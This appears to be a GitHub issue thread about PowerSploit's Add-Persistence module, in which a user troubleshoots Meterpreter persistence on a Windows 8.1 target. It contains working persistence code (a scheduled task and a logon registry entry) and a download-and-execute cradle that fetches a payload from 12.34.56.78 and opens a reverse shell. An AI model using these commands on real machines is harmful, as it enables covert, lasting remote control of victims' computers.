Closed GarrettVD closed 8 years ago
I fixed a couple bugs that I found in Add-Persistence, FYI.
The following simple payload should work. Give it a try and let me know.
$Payload = { Get-Date | Out-File -FilePath "$($Env:TEMP)\date.txt" -Append }
$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -Daily -At '10:00 AM'
$UserOptions = New-UserPersistenceOption -Registry -AtLogon
$PersistencePayload = Add-Persistence -ScriptBlock $Payload -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -PassThru
Invoke-Expression $PersistencePayload
Having some difficulty getting persistence to work properly. My payload doesn't appear to be executing at the specified times (Logon / Daily).
The scenario is this: I have a .bat file which executes the following:
http://12.34.56.78/payload is simply two modules combined into one file (Persistence.psm1 + Invoke--Shellcode.ps1) with my actual payload tacked onto the very end, which simply starts a notepad.exe process and invokes a windows/meterpreter/reverse_https on that instance:
The above works perfectly when there is no persistence involved -- I execute the .bat file on my target Windows 8.1 x64 machine, and my metasploit multi/handler on 12.34.56.78 springs to life and a Meterpreter session opens.
But no such luck with persistence, and I have a feeling that I'm not quite getting this right...
What I'm doing is base-64 encoding my payload ("IEX (New-Object Net.WebClient).DownloadString('http://12.34.56.78/payload')") and plopping it onto the following PowerShell script, which generates the Persistence.ps1 and RemovePersistence.ps1 files, which subsequently appear to do nothing / fail to spawn a meterpreter instance when executed on my Windows 8.1 machine, immediately or upon user logon. :(
Note that http://12.34.56.78/modules is the Persistence.psm1 + Invoke--Shellcode modules, without the meterpreter payload snippet. My train of thought there is, because I don't have PowerSploit installed on my target machine, they need to be loaded into memory? Maybe that's where the problem is.
Any ideas?